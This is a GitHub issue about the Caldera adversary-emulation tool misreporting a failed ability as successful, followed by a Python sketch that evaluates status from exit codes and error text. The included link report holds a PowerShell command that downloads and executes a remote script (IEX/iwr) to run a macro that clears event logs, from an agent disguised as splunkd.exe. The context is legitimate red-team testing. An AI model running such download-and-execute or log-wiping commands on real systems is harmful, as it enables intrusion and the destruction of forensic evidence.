Operations report status incorrectly displayed #2798

Closed
wapitica opened this issue Jul 28, 2023 · 2 comments
wapitica commented Jul 28, 2023

I am experiencing issues with the way Caldera is evaluating whether links/abilities have been successfully executed while no exit_code is available. In my case there is clearly an issue with the command execution, yet it gets flagged with a status of 0 (success). Wouldn't it be more logical to add the exit code as a potential discriminator for successful command execution?

```json
{
  "ability_metadata": {
    "ability_description": "Manual command ability",
    "ability_id": "05f8b752dbccff102ef530103bd8e550",
    "ability_name": "Clear Event Logs via VBA"
  },
  "agent_metadata": {
    "architecture": "amd64",
    "contact": "HTTP",
    "created": "2023-07-10T12:51:54Z",
    "group": "secops",
    "host": "perp-clt-w101",
    "location": "C:\\Users\\Public\\splunkd.exe",
    "paw": "ddntzl",
    "pid": 7024,
    "ppid": 5208,
    "privilege": "User",
    "username": "PERP\\kkevin"
  },
  "agent_reported_time": "2023-07-28T10:08:54Z",
  "attack_metadata": {
    "tactic": "defense-evasion",
    "technique_id": "T1070.001",
    "technique_name": "auto-generated"
  },
  "collected_timestamp": "2023-07-28T12:08:55Z",
  "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"",
  "delegated_timestamp": "2023-07-28T12:08:33Z",
  "executor": "psh",
  "finished_timestamp": "2023-07-28T12:08:59Z",
  "operation_metadata": {
    "operation_adversary": "ad-hoc",
    "operation_name": "TUC00034",
    "operation_start": "2023-07-28T12:08:33Z"
  },
  "output": {
    "exit_code": "",
    "stderr": "",
    "stdout": "Get-Content : Cannot find path 'C:\\Users\\kkevin\\Desktop\\PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt' because it does not exist.At line:77 char:22+ $macroCode = Get-Content $macroFile -Raw+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (C:\\Users\\kkevin...1-macrocode.txt:String) [Get-Content], ItemNotFoundException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand Exception calling \"Run\" with \"1\" argument(s): \"Can't run the specified macro\"At line:91 char:5+ $app.Run($sub)+ ~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : COMException "
  },
  "pid": 1636,
  "plaintext_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing); Invoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1070.001\\src\\T1070.001-macrocode.txt\" -officeProduct \"Word\" -sub \"ClearLogs\"",
  "platform": "windows",
  "status": 0
}
```

github-actions (bot) commented
Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/

wapitica (Author) commented
Seems like this issue was caused by an incomplete API call where I add an ability as a potential link to an operation. Unfortunately there is no default fallback for undefined parameters (e.g. tactic name, technique ID, etc.). In my case this resulted in the lack of the atomic parser module. After assigning the value explicitly I got correct readings. For me, given you already require the ability_id, it could use these values by default, just like it does if you use the GUI. Issue closed for me.
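Added example, not Caldera project code and not the reporter's: a Python sketch of the two points raised in this thread. `evaluate_status` applies the rule the first comment asks for (use `exit_code` when the agent reports one, otherwise treat anything on stderr, and for the `psh` executor the PowerShell error markers visible in the stdout above, as failure), and `fill_ability_defaults` shows the default-filling the second comment asks for when a potential link is added with only an `ability_id`. The sample link is constructed from the report above with its stdout trimmed; `STATUS_FAILURE = 1`, the names in `DEFAULTED_FIELDS`, the `parsers` value and the stored-ability lookup are assumptions, and nothing here calls the Caldera API.

```python
import json

# Status values as they appear in Caldera link reports. 0 = success is what the
# report above shows; 1 = failure is assumed here for the negative case.
STATUS_SUCCESS = 0
STATUS_FAILURE = 1

# Strings PowerShell emits alongside terminating and non-terminating errors.
# All three appear verbatim in the stdout captured in the report above.
PSH_ERROR_MARKERS = ("CategoryInfo", "FullyQualifiedErrorId", "Exception calling")

# Constructed sample: executor, output and status taken from the report above,
# with the stdout trimmed to the part that matters for classification.
SAMPLE_LINK = {
    "executor": "psh",
    "output": {
        "exit_code": "",
        "stderr": "",
        "stdout": (
            "Get-Content : Cannot find path 'C:\\Users\\kkevin\\Desktop\\PathToAtomicsFolder"
            "\\T1070.001\\src\\T1070.001-macrocode.txt' because it does not exist. "
            "+ CategoryInfo : ObjectNotFound: ... [Get-Content], ItemNotFoundException "
            "+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand "
            "Exception calling \"Run\" with \"1\" argument(s): \"Can't run the specified macro\""
        ),
    },
    "status": 0,
}


def evaluate_status(output: dict, executor: str) -> int:
    """Decide success/failure for one link.

    Precedence: a reported exit code wins; otherwise anything on stderr is a
    failure; otherwise, for the psh executor only, PowerShell error markers in
    stdout count as failure (PowerShell prints errors to stdout when the agent
    merges the streams, which is what the report above shows).
    """
    exit_code = str(output.get("exit_code", "")).strip()
    if exit_code:
        return STATUS_SUCCESS if exit_code == "0" else STATUS_FAILURE
    if output.get("stderr", "").strip():
        return STATUS_FAILURE
    if executor == "psh":
        stdout = output.get("stdout", "")
        if any(marker in stdout for marker in PSH_ERROR_MARKERS):
            return STATUS_FAILURE
    return STATUS_SUCCESS


def audit_link(link: dict) -> dict:
    """Compare the status recorded in a link report with the status the rules above give."""
    evaluated = evaluate_status(link["output"], link["executor"])
    return {
        "reported": link["status"],
        "evaluated": evaluated,
        "mismatch": evaluated != link["status"],
    }


# Fields the second comment says are not defaulted when a potential link is
# added with only an ability_id. Assumed names; tactic/technique_id/technique_name
# match the keys in attack_metadata above, "parsers" is an assumed key.
DEFAULTED_FIELDS = ("tactic", "technique_id", "technique_name", "parsers")


def fill_ability_defaults(requested: dict, stored: dict) -> dict:
    """Return the requested ability dict with missing fields copied from the stored ability.

    `stored` stands in for whatever the server already knows about the ability
    referenced by ability_id (a hypothetical lookup, not a Caldera API call).
    Explicitly supplied values are kept; only empty or absent fields are filled.
    """
    if requested.get("ability_id") != stored.get("ability_id"):
        raise ValueError("ability_id mismatch between request and stored ability")
    merged = dict(requested)
    for field in DEFAULTED_FIELDS:
        if not merged.get(field) and field in stored:
            merged[field] = stored[field]
    return merged


if __name__ == "__main__":
    print(json.dumps(audit_link(SAMPLE_LINK), indent=2))
    # Constructed stored ability using the ability_id and ATT&CK fields from the report above.
    stored_ability = {
        "ability_id": "05f8b752dbccff102ef530103bd8e550",
        "tactic": "defense-evasion",
        "technique_id": "T1070.001",
        "technique_name": "auto-generated",
        "parsers": ["atomic"],  # assumed representation of the atomic parser module
    }
    print(json.dumps(fill_ability_defaults(
        {"ability_id": "05f8b752dbccff102ef530103bd8e550"}, stored_ability), indent=2))
```

Run against the sample, `audit_link` reports `reported: 0`, `evaluated: 1`, `mismatch: true`, which is the discrepancy the issue describes. The stdout-marker fallback is deliberately scoped to `psh`; for other executors an empty exit code and empty stderr still evaluate as success, so the exit code remains the reliable signal to surface.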
